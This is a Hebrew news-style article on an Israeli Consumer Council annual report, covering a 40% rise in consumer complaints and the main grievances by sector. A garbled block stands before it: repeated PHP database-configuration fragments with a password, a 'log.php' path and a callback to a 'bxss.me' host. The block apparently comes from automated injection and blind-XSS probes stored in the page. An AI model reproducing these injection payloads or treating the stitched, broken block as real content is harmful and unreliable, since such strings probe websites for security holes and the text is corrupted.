$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>
מדוח שנתי שפירסמה המועצה הישראלית לצרכנות עולה כי נרשמה עלייה דרמטית של 40 אחוז במספר התלונות כנגד, יצרנים, חברות, נותני שירותים וספקים למיניהם. לטענת המועצה העלייה הדרמטית נובעת מחיזוק התודעה הצרכנית בקרב הציבור שמודע לזכויותיו ועושה את שאפשר כדי לממש זכויותיו ולא לאפשר לנותני השירותים לעבוד עליו.
הסיבות לתלונות
עיקר התלונות נובע מביטול עסקה על ידי הצרכן בעת רכישת נעליים, ביגוד ושירותי תיירות. המשותף לתלונות הוא בדרך כלל: הטעיה בפרסום, מוצר פגום, הבטחות שלא מומשו לקבל שירות או מוצר, עיכובים באספקה של המוצר לאחר תשלום.
העלייה במספר התלונות בעקבות ביטול עסקה נובעת לדברי המועצה מאז נכנסו לתוקף בשנת 2010 התקנות הנוגעות להחזר כספי ללקוח לאחר שביטל עסקה. היצרנים ובעלי העסקים מנסים כל העת לעכב את ההחזר ולהימנע מתשלומו בסיבות ותירוצים המנוגדים לתקנות
היצרנים ובעלי העסקים הנילונים
בתחום הריהוט טוען היצרן כי המוצר הוזמן במיוחד ולכן התקנות לא חלות עליו. כל זאת קורה גם כאשר המוצר פגום ולא עשוי מהחומרים שהתחייבו עליהם.
במוצרי חשמל טוענים הלקוחות שהמוצרים פגומים ואין חלקי חילוף. היצרנים מנגד טוענים שפתיחת האריזה לא מזכה בהחזר עקב ביטול העסקה.
בתחום המזון: עיקר הטענות נקשר להעלאות מחירים סמויות, סימון מחיר שגוי, הבדל בין המחיר המשולם בקופה לבין המחיר הנקוב על האריזה, מוצר שפג תוקפו וחשבוניות לא ברורות.
מתנה לא ניתן להחליף כי בעל החנות טוען כי המתנה נרכשה באמצעות תווי קנייה.
בתחום התחבורה יש טענות על איחורים, דילוג על תחנות ועומס רב.
בתחום התיירות- טעויות במחירי טיסות וחבילות, מצגים מנופחים של תנאים בבתי מלון ובפועל המרחק גדול
בענף התקשורת נרשמה אומנם ירידה אך הענף מוביל בראש הגופים הנילונים. מרבית הפניות והתלונות קשורות לענף הסלולאר., אחריו, שידורי הטלוויזיה והאינטרנט. חיוב על שירותים שלא נדרשו, חשבוניות מסובכות, העדר עדכון על סיום מבצעים ועוד.